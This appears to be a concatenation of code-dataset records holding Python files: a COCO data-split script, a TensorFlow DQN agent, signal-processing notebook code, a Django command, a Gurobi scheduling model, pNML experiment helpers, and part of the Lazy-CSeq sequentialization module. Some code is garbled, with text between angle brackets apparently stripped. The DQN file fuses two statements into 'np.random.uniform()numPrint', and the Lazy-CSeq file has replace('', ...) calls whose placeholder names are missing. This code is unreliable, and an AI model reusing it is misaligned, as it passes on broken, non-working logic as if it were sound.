random.random() > 0.8:\n csv_result_test.append(label_dct)\n shutil.copy(src_path + i, target_path + '/' + test_dir + '/' + i)\n else:\n csv_result_train.append(label_dct)\n shutil.copy(src_path + i, target_path + '/' + train_dir + '/' + i)\n\ncsv_df_train = pd.DataFrame(csv_result_train)\ncsv_df_train.to_csv('trainAnnotation.csv', header=None, index=False)\n\n\ncsv_df_test = pd.DataFrame(csv_result_test)\ncsv_df_test.to_csv('testAnnotation.csv', header=None, index=False)","sub_path":"keypoint/multi-label-image-classification/MSCOCO/get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"202948700","text":"# Author: Peiyong Jiang\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport time\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\nclass BRAIN:\n def __init__(self):\n self.numAction=4\n self.numFeature=2\n\n self.factorGreedyEpsilon=0.5\n self.factorGreedyEpsilonInc=0.001\n self.factorGreedyEpsilonMax=1.\n\n self.factorRewardDecayGamma=0.9\n\n self.factorLearningRate=0.0001\n\n self.sizeMemory=10000\n self.sizeBatch=128\n\n self.numAssignTE=500\n\n self.outputNNGraph=True\n\n self.memory=np.zeros((self.sizeMemory,self.numFeature*2+2))\n\n self.counterMemory=0\n self.counterLearn=0\n\n self.histLoss=[]\n\n self.BuildNet()\n\n\n\n # Get all variables in the netTarget and netEval\n paramsTarget=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,scope='netTarget')\n paramsEval=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,scope='netEval')\n\n with tf.variable_scope('assignTE'):\n self.assignTE=[tf.assign(t,e) for t,e in zip(paramsTarget,paramsEval)]\n\n self.sess=tf.Session()\n if self.outputNNGraph:\n os.system('rm -fr ./logs/*')\n tf.summary.FileWriter(\"logs/\",self.sess.graph)\n\n self.sess.run(tf.global_variables_initializer())\n\n\n\n #os.system('tensorboard --logdir logs')\n\n\n\n\n def BuildNet(self):\n # 整体思路:\n\n # 输入\n 
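# --- Aside (illustrative sketch, not part of this dataset record): BuildNet below wires up the
# --- standard DQN target  q_target = r + gamma * max_a' Q_target(s', a'),  with gradients stopped
# --- through the target network via tf.stop_gradient. The same quantity for one transition, in numpy:
import numpy as np
def q_target(reward, q_next_row, gamma=0.9):  # gamma matches factorRewardDecayGamma above
    return reward + gamma * np.max(q_next_row)  # bootstrap from the best next-state action-value

assert q_target(1.0, np.array([0.2, 0.5, 0.1, 0.4])) == 1.0 + 0.9 * 0.5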
self.stateNow=tf.placeholder(tf.float32,[None,self.numFeature],name='stateNow')\n self.stateNext=tf.placeholder(tf.float32,[None,self.numFeature],name='stateNext')\n self.rewardNow=tf.placeholder(tf.float32,[None,],name='rewardNow')\n self.actionNow=tf.placeholder(tf.int32,[None,],name='actionNow')\n\n # 初始化\n initializeW,initializeB=tf.random_normal_initializer(0,0.3),tf.constant_initializer(0.1)\n\n\n # build evaluate net:\n with tf.variable_scope('netEval'):\n netEval_1=tf.layers.dense(self.stateNow,20,tf.nn.relu,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netEval_1')\n\n self.netEval=tf.layers.dense(netEval_1,self.numAction,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netEval')\n\n # Build target net:\n with tf.variable_scope('netTarget'):\n netTarget_1=tf.layers.dense(self.stateNext,20,tf.nn.relu,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netTarget_1')\n\n self.netTarget=tf.layers.dense(netTarget_1,self.numAction,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netTarget')\n\n # qTarget:未来的\n # qTarget = r + gamma * qMaxS_\n with tf.variable_scope('qTarget'):\n qTarget=self.rewardNow+self.factorRewardDecayGamma*tf.reduce_max(self.netTarget,axis=1,name='qTarget')\n self.qTarget=tf.stop_gradient(qTarget)\n\n\n # qEval: 现在的\n with tf.variable_scope('qEval'):\n indexAction=tf.stack([tf.range(tf.shape(self.actionNow)[0],dtype=tf.int32),self.actionNow],axis=1)\n self.qEval=tf.gather_nd(params=self.netEval,indices=indexAction)\n\n # loss\n with tf.variable_scope('loss'):\n self.loss=tf.reduce_mean(tf.squared_difference(self.qTarget,self.qEval,name='TD_Error'),name='loss')\n\n # train:\n with tf.variable_scope('train'):\n self.train=tf.train.RMSPropOptimizer(self.factorLearningRate).minimize(self.loss)\n\n\n def StoreMemory(self,stateNow,counterRunNow,actionNow,rewardNow,stateNext,counterRunNext):\n pieceMemory=np.hstack((stateNow,counterRunNow,actionNow,rewardNow,stateNext,counterRunNext))\n indexMemory=self.counterMemory % self.sizeMemory\n self.memory[indexMemory,:]=pieceMemory\n self.counterMemory+=1\n\n def SelSamples(self):\n if self.counterMemory>self.sizeMemory:\n indexSample=np.random.choice(self.sizeMemory,size=self.sizeBatch)\n else:\n indexSample=np.random.choice(self.counterMemory,size=self.sizeBatch)\n\n memoryBatch=self.memory[indexSample,:]\n return memoryBatch\n\n def SelAction(self,stateNow,counterRunNow):\n stateNow=np.array([stateNow,counterRunNow])\n stateNow=stateNow[np.newaxis,:]\n\n if np.random.uniform()numPrint:\n plt.plot(self.histLoss[-numPrint:])\n else:\n plt.plot(self.histLoss)\n plt.ylabel('loss')\n plt.xlabel('training step')\n plt.title(self.factorGreedyEpsilon)\n plt.pause(0.001)\n #plt.show()\n\n\n\n\nif __name__ == \"__main__\":\n print('-'*50)\n brain=BRAIN()\n\n print('END @ BRAIN')\n","sub_path":"DQN/30/BRAIN.py","file_name":"BRAIN.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"162940018","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport pickle\r\nimport definitions\r\n\r\nimport src.features.proc_lib as proc\r\nplt.close(\"all\")\r\n\r\n# Load the dataset object\r\nfilename = \"g1_p0_v8_2.pgdata\"\r\n#filename = \"cycle_5_end.pgdata\"\r\ndirectory = definitions.root + \"\\\\data\\\\processed\\\\\" + filename\r\nwith open(directory, 'rb') as filename:\r\n data = 
pickle.load(filename)\r\n\r\n#data.plot_rpm_over_time()\r\n\r\n# Band pass filter the signal\r\nsigprocobj = proc.Signal_Processing()\r\nsigprocobj.info = data.info\r\nsigprocobj.dataset = data.dataset\r\nsigprocobj.filter_column(\"Acc_Carrier\", 3000, 3500)\r\ntsa_obj = proc.Time_Synchronous_Averaging()\r\n\r\n# Create a TSA object\r\ntsa_obj.info = data.info\r\ntsa_obj.derived_attributes = data.derived_attributes\r\ntsa_obj.dataset = sigprocobj.dataset # Notice that the dataset is exchanged for filtered dataset\r\ntsa_obj.dataset_name = data.dataset_name\r\ntsa_obj.PG = data.PG\r\n\r\noffset_frac = (1/62)*(0.5)\r\nwinds = tsa_obj.window_extract(offset_frac, 2*1/62, \"Acc_Carrier\", plot=False)\r\nwind_ave = tsa_obj.window_average(winds,plot=True)\r\n\r\n#tsa = data.Compute_TSA(0,3/62, plot=True)\r\n#data.plot_rpm_over_time()\r\n\r\n\r\n","sub_path":"notebooks/2.0-time-synchronous-averaging-dev.py","file_name":"2.0-time-synchronous-averaging-dev.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"613437251","text":"from django.core.management.base import BaseCommand\nfrom django.db import models\n\n\nclass Command(BaseCommand):\n help = '42cc Project Info'\n\n def handle(self, *args, **options):\n def __print(output):\n self.stdout.write(output)\n self.stderr.write(\"error: %s\" % output)\n\n __print(\"Models info:\\n\")\n for klass in models.get_models():\n __print(\"%s: %s objects\\n\" %\n (klass.__name__, klass.objects.count()))\n","sub_path":"extras/management/commands/project_info.py","file_name":"project_info.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"302730913","text":"__author__ = 'Mark'\n\nfrom read_input import read_input_file\nfrom gurobipy import *\n\n\ndef main():\n test_scheduling_problem_1 = read_input_file('sample_input_1.txt')\n test_scheduling_problem_2 = read_input_file('sample_input_2.txt')\n test_scheduling_problem = test_scheduling_problem_2\n solve_scheduling_problem_guribi(test_scheduling_problem)\n\n\ndef solve_scheduling_problem_guribi(scheduling_problem):\n\n m = Model(\"Scheduling\")\n\n x_variables = {}\n y_variables = {}\n z_variables = {}\n\n # VARIABLE X:\n # actor i, scene j, slot s\n for actor_name in scheduling_problem.actors:\n x_variables[actor_name] = {}\n for scene_name in scheduling_problem.scenes:\n x_variables[actor_name][scene_name] = {}\n for slot_identity in scheduling_problem.slots:\n actor = scheduling_problem.actors[actor_name]\n importance = actor.get_scene_importance(scene_name)\n x_variables[actor_name][scene_name][slot_identity] = m.addVar(vtype=GRB.BINARY,\n obj=importance,\n name=\"Actor %s, Scene %s, Slot %s\" % (actor_name, scene_name, slot_identity))\n\n # VARIABLE Y:\n # scene j, slot s\n for scene_name in scheduling_problem.scenes:\n y_variables[scene_name] = {}\n for slot_identity in scheduling_problem.slots:\n y_variables[scene_name][slot_identity] = m.addVar(vtype=GRB.BINARY,\n name=\"Scene %s, Slot %s\" % (scene_name, slot_identity))\n\n # VARIABLE Z:\n # scene j, slot s\n for scene_name in scheduling_problem.scenes:\n z_variables[scene_name] = {}\n for slot_identity in scheduling_problem.slots:\n z_variables[scene_name][slot_identity] = m.addVar(vtype=GRB.BINARY,\n name=\"Scene %s, Slot %s\" % (scene_name, slot_identity))\n\n m.modelSense = GRB.MAXIMIZE\n m.update()\n\n # CONSTRAINT\n # one scene per unit time\n for 
slot_identity in scheduling_problem.slots:\n m.addConstr(quicksum(y_variables[scene_name][slot_identity] for scene_name in scheduling_problem.scenes) <= 1,\n \"Timeslot %s %s \" % slot_identity)\n\n # CONSTRAINT\n # each scene between min and max\n for scene_name in scheduling_problem.scenes:\n scene = scheduling_problem.scenes[scene_name]\n m.addConstr(quicksum(z_variables[scene_name][slot_identity] for slot_identity in scheduling_problem.slots) >= scene.min_rehearsals,\n \"Scene %s min\" % scene_name)\n m.addConstr(quicksum(z_variables[scene_name][slot_identity] for slot_identity in scheduling_problem.slots) <= scene.max_rehearsals,\n \"Scene %s max\" % scene_name)\n\n # CONSTRAINT\n # actor free\n for actor_name in scheduling_problem.actors:\n for scene_name in scheduling_problem.scenes:\n for slot_identity in scheduling_problem.slots:\n actor = scheduling_problem.actors[actor_name]\n slot = scheduling_problem.slots[slot_identity]\n if slot in actor.free_slots and scene_name in actor.scenes_of_actor:\n m.addConstr(x_variables[actor_name][scene_name][slot_identity] <= y_variables[scene_name][slot_identity],\n 'Actor Free %s %s %s' % (actor_name, scene_name, slot_identity))\n else:\n m.addConstr(x_variables[actor_name][scene_name][slot_identity] == 0,\n 'Actor Not Free %s %s %s' % (actor_name, scene_name, slot_identity))\n\n # CONSTRAINT\n # scheduling constraints\n for scene_name in scheduling_problem.scenes:\n scene = scheduling_problem.scenes[scene_name]\n length = scene.length\n segments_by_day = scheduling_problem.segments_by_day\n days = len(segments_by_day)\n for day in range(days):\n # 1. cannot start towards end\n segments_this_day = segments_by_day[day]\n for segment in range(segments_this_day-length+1, segments_this_day):\n slot_identity = (day, segment)\n m.addConstr(z_variables[scene_name][slot_identity] == 0,\n 'Scheduling Constraint LATE for Scene %s at Slot %s' % (scene_name, slot_identity))\n # 2. 
ongoing iff started in past [length] segments\n for segment in range(segments_this_day):\n slot_identity = (day, segment)\n min_segment = max(segment - length, -1)\n m.addConstr(y_variables[scene_name][slot_identity] == quicksum(z_variables[scene_name][(day, i_segment)] for i_segment in range(segment, min_segment, -1)),\n 'Scheduling Constraint REG for Scene %s at Slot %s' % (scene_name, slot_identity))\n\n # solve\n m.optimize()\n\n # print solution\n print(\"Total Utility: \", m.objVal)\n print(\"Solution\")\n for scene_name in scheduling_problem.scenes:\n for slot_identity in scheduling_problem.slots:\n if z_variables[scene_name][slot_identity].x == 1.0:\n print(scene_name, ' rehearse start in ', slot_identity)\n\n return 0\n\n\ndef gurobi_test():\n\n m = Model(\"mip1\")\n\n x = m.addVar(vtype=GRB.BINARY, name=\"x\")\n y = m.addVar(vtype=GRB.BINARY, name=\"y\")\n z = m.addVar(vtype=GRB.BINARY, name=\"z\")\n\n m.update()\n\n m.setObjective(x + y + 2 * z, GRB.MAXIMIZE)\n\n m.addConstr(x + 2 * y + 3 * z >= 4, \"c01\")\n m.addConstr(x + 2 * y + 3 * z <= 5, \"c02\")\n\n m.addConstr(x + y >= 1, \"c1\")\n m.addConstr(x + z <= 1, \"c2\")\n\n m.optimize()\n\n for v in m.getVars():\n print(v.varName, v.x)\n\n print('Obj:', m.objVal)\n\n\nif __name__ == '__main__':\n main()","sub_path":"solve_scheduling_problem.py","file_name":"solve_scheduling_problem.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"161857024","text":"import copy\nimport logging\nimport multiprocessing as mp\nimport os\nimport os.path as osp\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom data_utils import DataBase\nfrom pnml_utils import Pnml\n\nlogger = logging.getLogger(__name__)\n\n\ndef execute_x_vec(x_test_array, data_h: DataBase, pnml_h, is_mp: bool, out_dir: str) -> list:\n # Initialize output\n save_dir_genies_outputs = osp.join(out_dir, 'genies_output')\n save_file_name = osp.join(out_dir, 'res_model_degree_{}_lamb_{}.npy'.format(data_h.model_degree, pnml_h.lamb))\n save_theta_erm_file_name = osp.join(out_dir,\n 'res_theta_erm_model_degree_{}_lamb_{}.npy'.format(data_h.model_degree,\n pnml_h.lamb))\n np.save(save_theta_erm_file_name, pnml_h.theta_erm)\n os.makedirs(save_dir_genies_outputs, exist_ok=True)\n\n # iterate on test samples\n if is_mp is False:\n res_list = execute_x_test_array(x_test_array, data_h, pnml_h, save_file_name, save_dir_genies_outputs)\n else:\n res_list = execute_x_test_array_mp(x_test_array, data_h, pnml_h, save_file_name, save_dir_genies_outputs)\n logger.info('Save to {}'.format(save_file_name))\n np.save(save_file_name, res_list)\n\n return res_list\n\n\ndef execute_x_test(x_test: float, data_h: DataBase, pnml_h: Pnml, save_dir_genies_outputs: str) -> dict:\n phi_test = data_h.convert_point_to_features(x_test, data_h.model_degree)\n y_hat_erm = pnml_h.predict_erm(phi_test)\n regret = pnml_h.execute_regret_calc(phi_test)\n\n # Save genies products\n np.save(osp.join(save_dir_genies_outputs, f'genies_outputs_{x_test}.npy'), pnml_h.genies_output)\n return {'x_test': x_test, 'regret': regret, 'y_hat_erm': y_hat_erm}\n\n\ndef execute_x_test_array(x_test_array: np.ndarray, data_h: DataBase, pnml_h: Pnml,\n save_file_name: str, save_dir_genies_outputs: str) -> list:\n res_list = []\n for i, x_test in enumerate(x_test_array):\n res = execute_x_test(x_test, data_h, pnml_h, save_dir_genies_outputs)\n res_list.append(res)\n logger.info('[{}/{}] x_test={}. 
Save to {}'.format(i, len(x_test_array), x_test, save_file_name))\n np.save(save_file_name, res_list)\n return res_list\n\n\ndef execute_x_test_array_mp(x_test_array: np.ndarray, data_h: DataBase, pnml_h: Pnml,\n save_file_name: str, save_dir_genies_outputs: str) -> list:\n pool = mp.Pool()\n logger.info('mp.cpu_count: {}'.format(mp.cpu_count()))\n results = []\n pbar = tqdm(total=len(x_test_array))\n\n def log_result(result):\n results.append(result)\n pbar.update()\n\n for i, x_test in enumerate(x_test_array):\n pool.apply_async(execute_x_test,\n args=(x_test, copy.deepcopy(data_h), copy.deepcopy(pnml_h), save_dir_genies_outputs),\n callback=log_result)\n\n pool.close()\n pool.join()\n pbar.close()\n res_list = sorted(results, key=lambda k: k['x_test'])\n np.save(save_file_name, res_list)\n return res_list\n","sub_path":"src/experimnet_utils.py","file_name":"experimnet_utils.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10065236","text":"\"\"\" Lazy-CSeq Sequentialization module\n maintained by Truc Nguyen Lam, University of Southampton.\n\"\"\"\nVERSION = 'lazyseqnewschedule-0.1-2016.08.08'\n\n\"\"\"\n\nTransformation:\n implements the lazy sequentialization schema\n (see Inverso, Tomasco, Fischer, La Torre, Parlato, CAV'14)\n\nPrerequisites:\n - all functions should have been inlined, except the main(), all thread functions, all __CSEQ_atomic_ functions, and function __CSEQ_assert\n - all loops should habe been unrolled\n - no two threads refers to the same thread function (use module duplicator.py)\n\nTODO:\n - get rid of _init_scalar() (see ext. notes)\n - check the STOP() inserting mechanism\n - this schema assumes no mutex_lock() in main() - is this fine?\n - handle typedef in guessing numbit\n\nChangelog:\n 2017.08.17 preserve __cs_exit function (not overriding with STOP_*VOID)\n 2017.02.28 add option to only guess __cs_pc_cs (instead of using addition)\n 2016.11.30 temporary disable of static for argc and argv variables\n 2016.11.29 remove nondet initialization if backend is CBMC\n 2016.11.22 fix problem with function pointer reference (smacker benchmarks)\n 2016.09.21 add specific main function to KLEE backend (with only round robin approach)\n 2016.09.21 fix small bug that causes the injection of GUARD in atomic function\n 2016.08.12 Add option to use only one pc_cs\n 2016.08.12 Add preanalysis from framac to guess the number of bits for each variable\n 2016.08.10 Add round robin (old schedule) option\n 2016.08.09 Add decomposepc option\n 2016.08.08 Initial version\n\n\"\"\"\nimport math, re, os.path\nfrom time import gmtime, strftime\nimport pycparser.c_parser, pycparser.c_ast, pycparser.c_generator\nimport core.common, core.module, core.parser, core.utils\n\n\nclass lazyseqnewschedule(core.module.Translator):\n __lines = {} # lines for each thread\n __threadName = ['main'] # name of threads, as they are found in pthread_create(s) - the threads all have different names\n __threadIndex = {} # index of the thread = value of threadcount when the pthread_create to that thread was discovered\n __threadCount = 0 # pthread create()s found so far\n\n __labelLine = {} # statement number where labels are defined [function, label]\n __gotoLine = {} # statement number where goto to labels appear [function, label]\n __maxInCompound = 0 # max label within a compound\n __labelLength = 55 # for labels to have all the same length, adding padding when needed\n __startChar = 't' # special char 
to distinguish between labeled and non-labelled lines\n\n __stmtCount = -1 # thread statement counter (to build thread labels)\n\n __currentThread = '' # name of the current thread (also used to build thread labels)\n\n __threadbound = 0 # bound on the number of threads\n\n __firstThreadCreate = False # set once the first thread creation is met\n __globalMemoryAccessed = False # used to limit context-switch points (when global memory is not accessed, no need to insert them)\n\n __first = False\n __atomic = False # no context-switch points between atomic_start() and atomic_end()\n\n _bitwidth = {} # custom bitwidth for specific int variables, e.g. ['main','var'] = 4\n\n _deadlockcheck = False\n\n __decomposepc = False # decompose pc\n\n __one_pc_cs = False # use only one pc_cs variable\n\n __roundrobin = True\n\n __preanalysis = {}\n __visiting_struct = False\n __struct_stack = [] # stack of struct name\n\n __visit_funcReference = False\n\n __extra_nondet = '= __CSEQ_nondet_uint()'\n\n __donotcheckpointer = False\n\n __guess_cs_only = False\n\n __dir_path = os.path.dirname(os.path.abspath(__file__))\n\n def init(self):\n self.addInputParam('rounds', 'round-robin schedules', 'r', '1', False)\n self.addInputParam('threads', 'max no. of thread creations (0 = auto)', 't', '0', False)\n self.addInputParam('deadlock', 'check for deadlock', '', default=False, optional=True)\n self.addInputParam('decomposepc', 'use seperate variable for each pc', '', default=False, optional=True)\n # self.addInputParam('onepccs', 'use one guess pc variable', '', default=False, optional=True)\n self.addInputParam('robin', 'use round robin schedule', '', default=False, optional=True)\n self.addInputParam('guess-cs-only', 'context switch is guessed only', '', default=False, optional=True)\n self.addInputParam('norobin', 'use new schedule', '', default=False, optional=True)\n self.addInputParam('preanalysis', 'use preanalysis input from abstract interpretation backend', 'u', default=None, optional=True)\n\n self.addInputParam('donotcheckvisiblepointer', 'do not check pointer for visible statement', '', default=False, optional=True)\n\n self.addOutputParam('bitwidth')\n self.addOutputParam('header')\n\n\n def loadfromstring(self, string, env):\n if self.getInputParamValue('deadlock') is not None:\n self._deadlockcheck = True\n\n threads = int(self.getInputParamValue('threads'))\n rounds = int(self.getInputParamValue('rounds'))\n backend = self.getInputParamValue('backend')\n\n if self.getInputParamValue(\"preanalysis\") is not None:\n self.__preanalysis = self.getInputParamValue(\"preanalysis\")\n if env.debug:\n seqfile = core.utils.rreplace(env.inputfile, '/', '/_cs_', 1) if '/' in env.inputfile else '_cs_' + env.inputfile\n if env.outputfile is not None and env.outputfile != '':\n seqfile = env.outputfile\n logfile = seqfile + '.framac.log.extract'\n with open(logfile, \"w\") as logfile:\n logfile.write(str(self.__preanalysis))\n\n if self.getInputParamValue('decomposepc') is not None:\n self.__decomposepc = True\n\n if self.getInputParamValue('onepccs') is not None:\n self.__one_pc_cs = True\n\n if self.__decomposepc and self.__one_pc_cs:\n self.error(\"Cannot select to option decomposepc and onepccs at the same time\\n\")\n\n if self.getInputParamValue('norobin') is not None:\n self.__roundrobin = False\n\n if self.getInputParamValue('robin') is not None:\n self.__roundrobin = True\n\n if self.getInputParamValue('donotcheckvisiblepointer') is not None:\n self.__donotcheckpointer = True\n\n if 
self.getInputParamValue('guess-cs-only') is not None:\n self.__guess_cs_only = True\n\n self.__threadbound = threads\n\n super(self.__class__, self).loadfromstring(string, env)\n\n if backend == 'cbmc' or backend is None:\n self.__extra_nondet = ''\n\n if backend == 'klee': # specific main for klee\n # Only use round robin style for klee\n if self.__decomposepc:\n self.output += self.__createMainKLEERoundRobinDecomposePC(rounds)\n elif self.__one_pc_cs:\n self.output += self.__createMainKLEERoundRobinOnePCCS(rounds)\n else:\n self.output += self.__createMainKLEERoundRobin(rounds)\n else:\n # Add the new main().\n if self.__roundrobin:\n if self.__decomposepc:\n self.output += self.__createMainRoundRobinDecomposePC(rounds)\n elif self.__one_pc_cs:\n self.output += self.__createMainRoundRobinOnePCCS(rounds)\n else:\n self.output += self.__createMainRoundRobin(rounds)\n else:\n if self.__decomposepc:\n self.output += self.__createMainDecomposePC(rounds)\n elif self.__one_pc_cs:\n self.output += self.__createMainOnePCCS(rounds)\n else:\n self.output += self.__createMain(rounds)\n\n # Insert the thread sizes (i.e. number of visible statements).\n lines = ''\n\n i = maxsize = 0\n\n for t in self.__threadName:\n if i <= self.__threadbound:\n if i>0: lines += ', '\n lines += str(self.__lines[t])\n maxsize = max(int(maxsize), int(self.__lines[t]))\n #print \"CONFRONTO %s %s \" % (int(maxsize), int(self.__lines[t]))\n i +=1\n\n ones = ''\n if i <= self.__threadbound:\n if i>0: ones += ', '\n ones += '-1'\n i +=1\n\n # Generate the header.\n #\n # the first part is not parsable (contains macros)\n # so it is passed to next module as a header...\n #print(dir_path)\n if self.__decomposepc:\n header = core.utils.printFile(self.__dir_path+'/lazyseqAdecomposepc.c')\n elif self.__one_pc_cs:\n header = core.utils.printFile(self.__dir_path+'/lazyseqAonepccs.c')\n else:\n header = core.utils.printFile(self.__dir_path+'/lazyseqA.c')\n header = header.replace('',str(threads))\n header = header.replace('',str(rounds))\n self.setOutputParam('header', header)\n\n i = 0\n pc_decls = ''\n pc_cs_decls = ''\n join_replace = ''\n for t in self.__threadName:\n if i <= self.__threadbound:\n threadsize = self.__lines[t]\n k = int(math.floor(math.log(threadsize,2)))+1\n pc_decls += 'unsigned int __cs_pc_%s;\\n' % i\n self._bitwidth['','__cs_pc_%s' % i] = k\n pc_cs_decls += 'unsigned int __cs_pc_cs_%s;\\n' % i\n self._bitwidth['','__cs_pc_cs_%s' % i] = k + 1\n join_replace += 'if (__cs_id == %s) __CSEQ_assume(__cs_pc_%s == __cs_thread_lines[%s]);\\n' % (i, i, i)\n i += 1\n join_replace += 'if (__cs_id >= %s) __CSEQ_assume(0);\\n' % (i)\n\n # ..this is parsable and is added on top of the output code,\n # as next module is able to parse it.\n if not self._deadlockcheck:\n if self.__decomposepc:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBnewscheduledecomposepc.c').replace('',lines)\n header = header.replace('', pc_decls + pc_cs_decls)\n header = header.replace('', join_replace)\n header = header.replace('', str(threads+1))\n elif self.__one_pc_cs:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBnewscheduleonepccs.c').replace('',lines)\n header = header.replace('', str(threads+1))\n else:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBnewschedule.c').replace('',lines)\n header = header.replace('', str(threads+1))\n else:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBdeadlock.c').replace('',lines)\n header = header.replace('', ones)\n\n self.insertheader(header)\n\n # Calculate 
exact bitwidth size for a few integer control variables of the seq. schema,\n        # good in case the backend handles bitvectors.\n        self._bitwidth['','__cs_active_thread'] = 1\n        k = int(math.floor(math.log(maxsize,2)))+1\n        if self.__decomposepc is False:\n            self._bitwidth['','__cs_pc'] = k\n            self._bitwidth['','__cs_pc_cs'] = k+1\n\n        self._bitwidth['','__cs_thread_lines'] = k\n\n        k = int(math.floor(math.log(self.__threadbound,2)))+1\n        self._bitwidth['','__cs_last_thread'] = k\n        self._bitwidth[core.common.changeID['pthread_mutex_lock'],'__cs_thread_index'] = k\n        self._bitwidth[core.common.changeID['pthread_mutex_unlock'],'__cs_thread_index'] = k\n\n        # self.setOutputParam('__cs_bitwidth', self._bitwidth)\n\n        # Fix gotos by inserting ASS_GOTO(..) blocks before each goto,\n        # excluding gotos whose destination is the line below.\n        for (a,b) in self.__labelLine:\n            if (a,b) in self.__gotoLine and (self.__labelLine[a,b] == self.__gotoLine[a,b]+1):\n                self.output = self.output.replace('<%s,%s>' % (a,b), '')\n            else:\n                self.output = self.output.replace('<%s,%s>' % (a,b), 'ASS_GOTO(%s)' % self.__labelLine[a,b])\n\n        self.setOutputParam('bitwidth', self._bitwidth)\n\n    def visit_Decl(self,n,no_type=False):\n        # no_type is used when a Decl is part of a DeclList, where the type is\n        # explicitly only for the first declaration in a list.\n        #\n        s = n.name if no_type else self._generate_decl(n)\n\n        if 'scalar' in self.__preanalysis and n.name in self.__preanalysis['scalar']:\n            self._bitwidth[self.__currentThread, n.name] = self.__preanalysis['scalar'][n.name]\n\n        if 'pointer' in self.__preanalysis and n.name in self.__preanalysis['pointer']:\n            self._bitwidth[self.__currentThread, n.name] = self.__preanalysis['pointer'][n.name]\n\n        if 'array' in self.__preanalysis and n.name in self.__preanalysis['array']:\n            self._bitwidth[self.__currentThread, n.name] = self.__preanalysis['array'][n.name]\n\n        if (self.__visiting_struct and\n                'struct' in self.__preanalysis and\n                self.__struct_stack[-1] in self.__preanalysis['struct'] and\n                n.name in self.__preanalysis['struct'][self.__struct_stack[-1]]\n                ):\n            # TODO: remember that for a struct field, only multiples of 8 bits are acceptable\n            numbit = self.__preanalysis['struct'][self.__struct_stack[-1]][n.name]\n            self._bitwidth[self.__struct_stack[-1], n.name] = numbit\n\n        if n.bitsize: s += ' : ' + self.visit(n.bitsize)\n        if n.init:\n            s += ' = ' + self._visit_expr(n.init)\n        return s\n\n    def _generate_struct_union(self, n, name):\n        \"\"\" Generates code for structs and unions. 
name should be either\n 'struct' or union.\n \"\"\"\n s = name + ' ' + (n.name or '')\n # There should be no anonymous struct, handling in workarounds module\n self.__visiting_struct = True\n if n.name:\n self.__struct_stack.append(n.name)\n if n.decls:\n s += '\\n'\n s += self._make_indent()\n self.indent_level += 2\n s += '{\\n'\n for decl in n.decls:\n s += self._generate_stmt(decl)\n self.indent_level -= 2\n s += self._make_indent() + '}'\n self.__visiting_struct = False\n self.__struct_stack.pop()\n return s\n\n\n def visit_Compound(self, n):\n s = self._make_indent() + '{\\n'\n self.indent_level += 1\n\n # Insert the labels at the beginning of each statement,\n # with a few exclusions to reduce context-switch points...\n #\n if n.block_items:\n for stmt in n.block_items:\n # Case 1: last statement in a thread (must correspond to last label)\n if type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_exit']: ##if type(stmt) == pycparser.c_ast.FuncCall and self._parenthesize_unless_simple(stmt.name) == core.common.changeID['pthread_exit']:\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n stamp = '__CSEQ_rawline(\"%s%s_%s: \");\\n' % (self.__startChar, self.__currentThread, str(self.__stmtCount))\n code = self.visit(stmt)\n newStmt = stamp + code + ';\\n'\n s += newStmt\n # Case 2: labels\n elif (type(stmt) in (pycparser.c_ast.Label,)):\n # --1-- Simulate a visit to the stmt block to see whether it makes any use of pointers or shared memory.\n #\n globalAccess = self.__globalAccess(stmt)\n newStmt = ''\n # --2-- Now rebuilds the stmt block again,\n # this time using the proper formatting\n # (now we know if the statement is accessing global memory,\n # so to insert the stamp at the beginning when needed)\n #\n if not self.__atomic and self.__stmtCount == -1: # first statement in a thread\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"IF(%s,%s,%s%s_%s)\");\\n' % (threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n code = self.visit(stmt.stmt)\n newStmt = stamp + code + ';\\n'\n elif (not self.__visit_funcReference and (\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__CSEQ_atomic_begin') or\n (not self.__atomic and\n (globalAccess or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_create']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_join']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_atomic') and not stmt.name.name == '__CSEQ_atomic_end') or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_assume')) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__cs_cond_wait_2')\n )\n )\n 